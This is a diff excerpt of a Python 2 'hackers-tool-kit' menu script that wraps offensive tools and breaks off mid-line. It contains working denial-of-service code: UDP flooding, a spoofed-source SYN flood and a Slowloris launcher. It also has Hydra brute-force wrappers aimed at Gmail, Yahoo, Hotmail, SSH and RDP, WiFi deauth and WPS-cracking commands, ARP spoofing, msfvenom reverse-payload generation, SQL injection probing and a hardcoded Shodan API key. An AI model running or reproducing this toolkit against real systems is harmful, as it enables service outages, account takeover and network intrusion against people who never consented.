'\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 